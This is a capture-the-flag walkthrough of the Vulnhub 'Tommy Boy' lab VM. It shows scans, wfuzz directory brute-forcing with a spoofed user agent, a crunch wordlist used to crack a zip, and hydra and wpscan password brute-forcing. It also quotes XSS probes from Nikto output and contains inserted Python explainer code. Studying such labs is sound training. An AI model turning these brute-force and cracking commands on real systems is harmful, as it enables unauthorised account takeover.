Tommy Boy 1 CTF VM — Vulnhub.com

Andrew Hilton
24 min read, Aug 5, 2016


Let's just get straight into it. As usual I start with a really simple netdiscover:

netdiscover

IP 192.168.1.104

nmap -T4 -A -v 192.168.1.104
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT

Ok so we have ports open:
22 ssh
80 http
8008 http

That's a few things to start looking at, so let's start at the top with SSH on port 22.

root@kali:~# ssh 192.168.1.104
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:bI4/w4tR6j1XRyuLkIs5icsyLJM0Kfw9m4iPFpXX0NI.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /root/.ssh/known_hosts:7
remove with:
ssh-keygen -f "/root/.ssh/known_hosts" -R 192.168.1.104

ECDSA host key for 192.168.1.104 has changed and you have requested strict checking.
Host key verification failed.

Ok, I don't really understand this at the moment, but the ssh-hostkey section of the scan returned something about the SSH key:
ssh-hostkey:
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)

So I think I'm going to have to Google a bit and see what it means. Right now it seems like I need to change the host key in /root/.ssh/known_hosts, but I haven't got root yet :-( Ok, let's move on to the HTTP ports with Firefox and a Nikto scan.
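What that warning is actually checking, as an added example (my own code, not from the original post or the VM): the ssh client keeps a known_hosts file locally and refuses to connect when the key a host offers differs from the entry recorded for that address, and the MD5-style fingerprint nmap printed and the SHA256 one ssh printed are just two digests of the same key blob. The keys and the known_hosts file below are constructed, and entries are assumed to be in plain (unhashed) form.

```python
import base64
import hashlib


def parse_pubkey(line: str):
    """Split an OpenSSH public-key line ('ssh-ed25519 AAAA... comment')
    into (key_type, raw_key_blob)."""
    parts = line.split()
    return parts[0], base64.b64decode(parts[1])


def fingerprint_md5(blob: bytes) -> str:
    """Legacy colon-separated MD5 fingerprint, the style nmap's ssh-hostkey prints."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fingerprint_sha256(blob: bytes) -> str:
    """Modern OpenSSH fingerprint: 'SHA256:' plus unpadded base64 of the digest."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def check_known_hosts(known_hosts_text: str, host: str, offered_line: str) -> str:
    """Emulate the decision ssh makes with strict host key checking:
    'OK'      - host is listed with the same key type and the same key
    'CHANGED' - host is listed for this key type but the key differs (the warning above)
    'NEW'     - no entry for this host and key type (ssh would ask before adding it)"""
    offered_type, offered_blob = parse_pubkey(offered_line)
    for lineno, line in enumerate(known_hosts_text.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        hosts_field, key_type, b64 = line.split()[:3]
        # One entry can cover several names/addresses separated by commas.
        if host not in hosts_field.split(",") or key_type != offered_type:
            continue
        if base64.b64decode(b64) == offered_blob:
            return "OK"
        return f"CHANGED (offending key in known_hosts:{lineno})"
    return "NEW"


def make_ed25519_line(key_bytes: bytes, comment: str) -> str:
    """Build a syntactically valid ssh-ed25519 public-key line from 32 constructed
    bytes. Only the wire format matters for fingerprints and known_hosts matching,
    so no real key pair is generated here."""
    assert len(key_bytes) == 32
    key_type = b"ssh-ed25519"
    blob = (len(key_type).to_bytes(4, "big") + key_type
            + len(key_bytes).to_bytes(4, "big") + key_bytes)
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# Constructed sample data: the key a previous lab VM at this address left behind,
# and the different key the Tommy Boy VM now offers on the same IP.
OLD_VM_KEY = make_ed25519_line(bytes(range(32)), "old-vm")
TOMMYBOY_KEY = make_ed25519_line(bytes(range(32, 64)), "callahan")
KNOWN_HOSTS = "\n".join([
    "# constructed ~/.ssh/known_hosts on the attacking box",
    "192.168.1.50 " + " ".join(OLD_VM_KEY.split()[:2]),
    "192.168.1.104 " + " ".join(OLD_VM_KEY.split()[:2]),
])

if __name__ == "__main__":
    _, blob = parse_pubkey(TOMMYBOY_KEY)
    print("MD5    ", fingerprint_md5(blob))
    print("SHA256 ", fingerprint_sha256(blob))
    print("verdict", check_known_hosts(KNOWN_HOSTS, "192.168.1.104", TOMMYBOY_KEY))
```

Comparing the fingerprint ssh prints with what nmap's ssh-hostkey reported tells you whether the mismatch is a stale entry from another VM that used the same address (the usual case in a lab) or something that needs a closer look.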

firefox 192.168.1.136 (the eagle-eyed among you might notice that the IP has changed; I've switched from the wifi dongle to the home wifi network)

Nothing immediately jumps off the page, so let's look at the source code for it.

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down. Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!-- Comment from Nick: backup copy is in Big Tom's home folder -->
<!-- Comment from Richard: can you give me access too? Big Tom's the only one w/password -->
<!-- Comment from Nick: Yeah yeah, my processor can only handle one command at a time -->
<!-- Comment from Richard: please, I'll ask nicely -->
<!-- Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog -->
<!-- Comment from Richard: Deal. Where's the blog again? -->
<!-- Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember:
https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!-- Comment from Richard: Ah! How could I forget? Thanks -->

Cool, first clue!!! Let's see what that YouTube video link is and see if we can start to guess what the clue means.

I'm going to go with Prehistoric Forest or some combination of these.
(added to my working notes for now)

The Nikto scan returned so much info, I’ve never seen a scan return so much. Here’s just a dump of it and then I’ll go back through it and look for more relevant entries:

root@kali:~# nikto -host 192.168.1.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.136
+ Target Hostname: 192.168.1.136
+ Target Port: 80
+ Start Time: 2016–07–30 08:31:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x498 0x5371fb88ff1d8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /webcgi/: Directory indexing found.
+ OSVDB-3268: /cgi/: Directory indexing found.
+ OSVDB-3268: /cgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-sys/: Directory indexing found.
+ OSVDB-3268: /cgibin/: Directory indexing found.
+ OSVDB-3268: /cgi-win/: Directory indexing found.
+ OSVDB-3268: /fcgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-exe/: Directory indexing found.
+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ OSVDB-3268: /iisadmin/: Directory indexing found.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
+ OSVDB-3268: /webmail/: Directory indexing found.
+ /webmail/: Web based mail package installed.
+ OSVDB-3268: /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>: Directory indexing found.
+ OSVDB-3268: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: Directory indexing found.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-3268: /ariadne/: Directory indexing found.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ OSVDB-3268: /manager/: Directory indexing found.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3268: /web/: Directory indexing found.
+ OSVDB-3268: /publisher/: Directory indexing found.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
+ OSVDB-3268: /photo/: Directory indexing found.
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.

(ABOUT ANOTHER 150 LINES OF OSVDB ENTRIES WERE ALSO LISTED BUT I DELETED THEM TO SAVE YOU HAVING TO ENDLESSLY SCROLL THROUGH THEM IN THIS WALKTHROUGH)
---------------------------------------------------------------------------

Ok, where the F do I start?? Somewhere is better than nowhere. The first things that got my attention were these entries close to the top.

+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.

Let's see what each of these 4 entries has on it.

http://192.168.1.136/6packsofb...soda/

The linked file is this
http://192.168.1.136/6packsofb...soda/6packsofsoda.jpg

Nothing really obvious straight away. Let's move on after making a note of the jpg address; we'll take a deeper look in a bit.

192.168.1.136/lukeiamyourfather

Same as before, let's just jump ahead and if we need to I'll come back and deep dive the images.

http://192.168.1.136/lookalivelowbridge/

The last entry of the robots.txt is the first flag in plain text.
***** Flag 1 found *****

This is the first of five flags in the Callhan Auto server. You’ll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Carrying on down through the Nikto scan next I saw these entries:

+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ OSVDB-3268: /iisadmin/: Directory indexing found.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.

So let's see if we can get anything from these. No real luck TBH: they are all directories but they are essentially blank (which makes sense, as reading the description of the box on Vulnhub.com suggests we need to load a backup of the company's website as it's been deleted).

Interestingly all the pages have this at the bottom of them
Apache/2.4.18 (Ubuntu) Server at 192.168.1.136 Port 80

So let's see if there are any known exploits for this version of Apache server. Nothing really that's useful at the moment.

Thinking back to the source code notes from above it seems like Nick is the “IT guy” for this box as he’s saying he’ll set up another user as an admin.

So I’m going to use the username nick and run hydra on the ssh port. Fingers crossed it returns something.

root@kali:~# hydra -l nick -P /usr/share/wordlists/rockyou.txt 192.168.1.136 ssh
[DATA] attacking service ssh on port 22

That is going to take a long time. I'll leave it running and come back later.

What's on the last port that's open, 8008??
It's a webpage with a short note on it (I've quoted the text in full further down).

Looking at the source code doesn't offer anything further, ok what does the clue mean??
I guess it could mean an ftp server (going on the line “This is only for Nick’s super secret stuff”).

After trying a few FTP commands I couldn't connect!! :-(
Ok time for a tea break I think. I’ll be back haha I’m completely at a dead end right now.

Ok let’s get back to it. The webpage I’m stuck on has this writing on it:

This is only for Nick’s super secret stuff. If you don’t know where to go from here, you’re not sup3rl33t enough.
Leave now!
Only me and Steve Jobs are allowed to look at this stuff.
Lol
-Nick

So I can't see the content because I'm not super leet enough. But Nick seems to think he is. After about 5 hrs of trying so many different versions/combinations of the words Nick, Sup3r, L33t, etc. I finally found it: NickIzL33t. Using that as a folder address gets us to another webpage with the text:

It sounds like we need to brute force our way into the fortress, so let's run Nikto on the new page we've just found. Nothing came back.

Ok let’s read through my working notes again, what am I missing?

The company blog has something to do with Prehistoric Forest, so let's try and see if we can locate the blog.

192.168.1.136/prehistoricforest

Holy Frak!!!!! That worked, I’m on the company blog

I’m going to have a look around and see what info I can gather to hopefully move on to the next step.

The first blog post tells us to go to the /richard folder on the server for the password for the second blog post, which is protected.

The /richard folder has a jpg in it called shockedrichard.jpg. Looking at the picture doesn't seem to give me any clues and neither does the source code. I'm going to download it and have a look at the EXIF data.

root@kali:~# exiftool -verbose /root/shockedrichard.jpg

LOADS OF THE USUAL EXIF DATA THAT DIDN'T REALLY HELP AT ALL, BUT THEN I NOTICED THIS LINE. I'VE NOT SEEN THIS BEFORE.

| | 1) UserComment = ASCIIce154b5a8e59c89732bc25d6a2e6b90b

Let's see if we can decode it at all.

Jumping over to crackstation.net deleting the ASCII from the start and running the string through it gives us the word SPANKY.

So let's use that on the second blog post. That didn't seem to work. For some reason when I click any of the blog posts the IP in the address bar changes from a .136 to a .104 ending, which gives me a page not found.
If I manually change it back then I can get to the page, but not the password-protected one. Let's come back to this in a minute.
On to the next blog post. Most of them are just random posts to each other, but the 1st post had a reply to it and in it was an address for the 2nd flag string.

Flag 02 = thisisthesecondflagyayyou.txt

192.168.1.136/prehistoricforest/thisisthesecondflagyayyou.txt gives me the actual flag data.

You’ve got 2 of five flags — keep it up!

Flag data: Z4l1nsky

***** Flag 2 Found *****

Ok I’ve got to figure out a way to enter that password for the protected blog post without it changing the address. TURNS OUT I WAS HAVING ISSUES WITH MY NETWORK ADAPTER IN VMWARE. AFTER A LITTLE MESSING AROUND I GOT IT WORKING AGAIN AND ALL THE VM’S ARE NOW PLAYING NICELY TOGETHER. Thanks to Geckom (Vulnhub IRC) for the help with that.

So it's back to the webpage, using the passwd spanky to gain access to the protected blog post.

FINALLY ITS WORKED!!!

I’m on a webpage with the following text:

Michelle/Tommy,

This is f’d up.

I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.

Here’s everything I know:

You guys are all hopeless sheep :-/
The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

Ok so to summarise:

The backup called callahanbak.bak just needs to be renamed to index.html (you have to use Big Tom's account via SSH).

Big Tom's account is in the user list (but isn't called bigtom).

Nick's home folder is reachable via FTP, but not on the standard port (not sure what port it's on at this point).
The FTP server goes on/off every 15 minutes: on at the top of the hour and then cycling every 15 mins.

Nick's FTP login = nickburns (not sure of the password yet, but it's very easy).

Nick deleted his SSH access but the creds still work on FTP.

So it's currently 10.29am, so I think I'll run an nmap scan and see if I can pick up the FTP port before it switches off again.

kali:~# nmap 192.168.211.133 -p 0-70000
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016–08–01 05:31 EDT
Ports specified must be between 0 and 65535 inclusive
QUITTING!

That's interesting. Ok, so let's rerun the scan on the last 100 ports to start with and see if we can find the port.

root@kali:~# nmap 192.168.211.133 -p 65435-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016–08–01 05:35 EDT
Nmap scan report for 192.168.211.133
Host is up (0.00049s latency).
Not shown: 100 closed ports
PORT STATE SERVICE
65534/tcp open unknown
MAC Address: 00:0C:29:AD:05:01 (VMware)

BINGO!! The scan found the FTP port on 65534. Current time is 10.34am, let's see if we can connect before 10.45.

root@kali:~# ftp 192.168.211.133 65534
Connected to 192.168.211.133.
220 Callahan_FTP_Server 1.3.5
Name (192.168.211.133:root): nickburns
331 Password required for nickburns
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 02:37 readme.txt
226 Transfer complete

ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete

ftp> exit

Wow, that was intense. I’ve never really been up against the clock like that before. It was fun.
Ok so all that seemed to be on there was Nick's readme.txt file, so I downloaded it before the time was up. Let's take a look at it.

root@kali:~# cat /root/readme.txt
To my replacement:

If you’re reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You’ll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn’t know a fax machine
from a flame thrower!

Anyway I’m not completely without mercy. There’s a subfolder called “NickIzL33t” on this server
somewhere. I used it as my personal dropbox on the company’s dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom’s a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the “NickIzL33t” folder as well. But guess what?
He always forgets THAT password as well. Luckily I’m a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

I now 100% know I’ve attacked this VM the wrong way round. I found that NickIzL33t folder before, when I got stuck and it took me about 5 hrs of banging my head against all the walls to come up with that combination NickIzL33t.
Ah well lesson learnt I guess. And it did feel SO great when I found that folder on my own. I’m pissed off it took me so long but really proud I found it.

So back to http://192.168.211.133:8008/NickIzL33t and we’re back on the webpage but it’s slightly different this time.

It still says only him and Steve Jobs can see this content, but it now says it's a dropbox. My original idea when I saw the page the first time round was that it needed to be viewed on an Apple device. I don't have one to hand to test out the idea, so I thought I'd try viewing it in Safari. THAT DIDN'T WORK!!

After googling for a bit, trying to find out how I could view things whilst appearing as something else, I found a Firefox plugin called User Agent Switcher. It comes with a few default user agents already loaded, so I just picked the iPhone one and then reloaded the page.

Cool, that took a while but I now understand user agents and how to spoof them. All good things I feel.

The webpage is now this:

So I'm a step closer but not fully there yet. It seems the folder I'm looking for has a very exact name to it. Let's see if I can find it with DirBuster.
Nope, that didn't work. I got a lot of errors though. I think it's because I'm not sending the requests with the spoofed UA, so let's try wfuzz next and set the UA header.

root@kali:~# wfuzz -c -v -w /usr/share/wordlists/rockyou.txt -H "User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" --hc 404 http://192.168.211.133:8008/NickIzL33t/FUZZ.html

After a really, really long time I eventually got a hit: fallon1

http://192.168.211.133:8008/NickIzL33t/fallon1.html

So the page is giving us a few bits of info. Lets take a look at them.

hint.txt:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!
And because you were choosing stupidiculous passwords like “password123” and “brakepad” I
enforced new password requirements on you…13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife’s nickname “bev” (note it’s all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that’s a lot of keys to push but make sure you type them altogether in one
big chunk ok? Heh, “big chunk.” A big chunk typing big chunks. That’s funny.

LOL

-Nick

Third flag.txt:
THREE OF 5 FLAGS — you’re awesome sauce.

Flag data: TinyHead

***** Flag 3 found *****

And the last link is the encrypted passwd backups for Big Tom. Clicking the link saves the file as tOmsp4sswOrdz.zip

So I need to figure out how to create a custom dictionary using the hints Nick has given us.

It starts with 'bev', 1 upper case char, 2 numbers, 2 lowercase chars, one symbol and then 1995

bev[A-Z][0-9][0-9][a-z][a-z][symbol]1995

So that's the string that I need to use, but I'm not sure what application to use at the moment. Let's jump over to Google.

I found an article from Null Byte that uses an application called crunch. Here's a link to the article if you need it.
http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/

So I needed to create a dictionary using crunch; the command I used was

crunch 13 13 -t bev,%%@@^1995 -o tommypasswd.txt

Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800

58 million combinations, fair enough. I was really surprised when it only took about 20 seconds for crunch to complete the task.
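To check Nick's hint sheet against the numbers crunch printed, here is an added example (my own code, not from the original post or from crunch) that expands the same -t template, counts the key space without generating it, and validates a single candidate against the policy. It assumes crunch's default 33-character symbol set for ^ (32 punctuation characters plus a space); under that assumption the line and byte counts come out at exactly the 58,000,800 and 812,011,200 crunch reported.

```python
import itertools
import math
import string

# The crunch -t template used on the page, built from Nick's hint sheet.
PATTERN = "bev,%%@@^1995"

# Assumed to be crunch's default symbol set for '^': 32 punctuation characters plus a space.
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "

PLACEHOLDERS = {
    ",": string.ascii_uppercase,   # one uppercase character
    "%": string.digits,            # one digit
    "@": string.ascii_lowercase,   # one lowercase character
    "^": SYMBOLS,                  # one symbol
}


def expand(pattern: str) -> list:
    """Turn a crunch -t template into one character set per position; any
    character that is not a placeholder is a literal (here 'bev' and '1995')."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def keyspace_size(pattern: str) -> int:
    """Number of candidates the template describes, computed without enumerating them."""
    total = 1
    for charset in expand(pattern):
        total *= len(charset)
    return total


def wordlist_bytes(pattern: str) -> int:
    """Size of the file crunch -o writes: every candidate plus its newline."""
    return keyspace_size(pattern) * (len(pattern) + 1)


def entropy_bits(pattern: str) -> float:
    """Effective strength once the structure is known: 13 characters long, but
    only log2(keyspace) bits, which is why the zip fell to an offline wordlist."""
    return math.log2(keyspace_size(pattern))


def candidates(pattern: str):
    """Lazily yield candidates in odometer order (rightmost variable position
    changes fastest), so the first one is 'bevA00aa!1995'."""
    for combo in itertools.product(*expand(pattern)):
        yield "".join(combo)


def matches_policy(candidate: str, pattern: str = PATTERN) -> bool:
    """Check one password against the template without generating anything."""
    charsets = expand(pattern)
    return len(candidate) == len(charsets) and all(
        ch in charset for ch, charset in zip(candidate, charsets))


if __name__ == "__main__":
    print(f"{keyspace_size(PATTERN):,} candidates, {wordlist_bytes(PATTERN):,} bytes, "
          f"{entropy_bits(PATTERN):.1f} bits of effective entropy")
    print("first five:", list(itertools.islice(candidates(PATTERN), 5)))
    print("bevH00tr$1995 fits the policy:", matches_policy("bevH00tr$1995"))
```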

So now I've got my custom dictionary formatted from Nick's clues, let's use it to brute force Big Tom's password file. I'll use fcrackzip.

root@kali:~# fcrackzip -v -D -u -p /root/tommypasswd.txt /root/t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc 332/ 641, flags 9, chk 9aad)
checking pw bevG72kn~1995

PASSWORD FOUND!!!!: pw == bevH00tr$1995

Cool, that didn't take as long as I was expecting. So the password is bevH00tr$1995

Let's use that to unzip the passwd text file and see what's in there.

Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
--------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat1938

Note: after the “fatguyinalittlecoat” part there are some numbers, but I don’t remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Alright, so we have some more info but nothing is 100% complete. I'm still trying to get into Big Tom's SSH. I know his username and the first part of his password, but to find the last part (the remaining numbers at the end) I need to get access to the blog, as Nick has left himself a draft containing those numbers.

So how to get into the blog??
The username is not bigtom. But I remember there was a blog post written by Big Tom, so let's see who the author is and try that as the username.

http://192.168.211.133/prehistoricforest/index.php/author/tom/ is the URL of the post. I can see it was written by the user tom, and that author is in fact Big Tom.

So I've got Big Tom's real blog username. Now the password clue is something to do with a famous Queen song. A rather longer Google search than I really wanted gave me an idea.
One of their songs is We Will Rock You. I have a huge password list called rockyou.txt, so let's try the easy option first and head over to the WordPress blog login screen.

http://192.168.211.133/prehistoricforest/wp-login.php

I know the username is tom and I’ll try the password rockyou

Ok so that didn't work, but interestingly it did confirm that tom was the correct username.

So the next thing I was going to try was run hydra on the wp login screen with the username tom and using the rockyou.txt dictionary. For some reason I couldn’t get the correct syntax to make hydra attack the login page. Not to worry though as I can use wp-scan which is probably going to be a better bet as it’s designed for the job.

So running the command:
root@kali:~# wpscan --url http://192.168.211.133/prehistoricforest/wp-login.php --wordlist /usr/share/wordlists/rockyou.txt --username tom --wp-content-dir /wp-content

Cool after a few minutes wp-scan gives us the password as tomtom1

so back over to firefox and enter the username tom and the password tomtom1.

Cool, I'm in. Let's find the draft folder with the end of the password text in it. There is only one draft:

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I'M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I'LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

That’s it, we now have the username and the two parts of the password for bigtom’s “ess ess eight” login.

Let's put it all together and see what we can find.

root@kali:~# ssh bigtommysenior@192.168.211.133
bigtommysenior@192.168.211.133's password: fatguyinalittlecoat1938!!

Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64)

* Documentation: https://help.ubuntu.com/

150 packages can be updated.
0 updates are security updates.

Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$

We're in, let's have a look around and see what's there.

bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP

Let’s go straight for the flag text first.

bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.
Flag data: EditButton

But…but…where’s flag 5?

I’ll make it easy on you. It’s in the root of this server at /5.txt

***** Flag 5 Found *****

So before we rename the backup file and get it all working again, let's go after that 5th flag.

bigtommysenior@CallahanAutoSrv01:~$ pwd
/home/bigtommysenior
Just so I know where I currently am, but more importantly where the backup file is.

Navigate back up to the root directory and list the files (there were loads more in the folder but I'm only interested in the 5.txt file):

bigtommysenior@CallahanAutoSrv01:/$ ls -la
total 105
drwxr-xr-x 25 root root 4096 Jul 15 12:35 .
drwxr-xr-x 25 root root 4096 Jul 15 12:35 ..
-rwxr-x--- 1 www-data www-data 520 Jul 7 15:36 .5.txt

bigtommysenior@CallahanAutoSrv01:/$ cat .5.txt
cat: .5.txt: Permission denied

WTF!!

bigtommysenior@CallahanAutoSrv01:/$ whoami
bigtommysenior

Haha ok, we're not logged in as the correct user to view the 5.txt file; it's owned by www-data. Ok, let's come back to this in a bit. I'm going to reinstall the backup file.

bigtommysenior@CallahanAutoSrv01:/$ cd home
bigtommysenior@CallahanAutoSrv01:/home$ ls

bigtommysenior nickburns tommy
(I tried the other 2 profiles but they were locked up tight)
bigtommysenior@CallahanAutoSrv01:/home$ cd bigtommysenior/
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP

So way back at the beginning of the VM I found out I had to rename the backup file as index and all would be ok.

